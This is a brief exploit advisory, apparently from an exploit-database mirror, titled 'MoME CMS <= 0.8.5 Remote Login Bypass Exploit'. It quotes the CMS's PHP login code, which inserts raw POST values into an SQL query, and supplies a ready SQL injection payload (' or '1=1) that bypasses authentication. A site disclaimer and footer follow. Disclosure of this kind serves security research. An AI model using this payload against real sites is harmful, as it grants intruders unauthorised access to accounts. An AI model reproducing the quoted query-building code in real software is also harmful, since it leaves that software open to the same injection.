\#'#/ (-.-) --------------------oOO---(_)---OOo------------------- | MoME CMS <= 0.8.5 Remote Login Bypass Exploit | | (works only with magic_quotes_gpc = off) | ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Download: http://sourceforge.net/projects/mome/files/ [!] Date: 16.01.2010 [!] Remote: yes [!] Code : //controllo user e passwd da login if(isset($_POST['posted_username']) && isset($_POST['posted_password'])) { $query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND password=md5('$_POST[posted_password]')"; [!] PoC: username : ' or '1=1 password : cr4wl3r
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论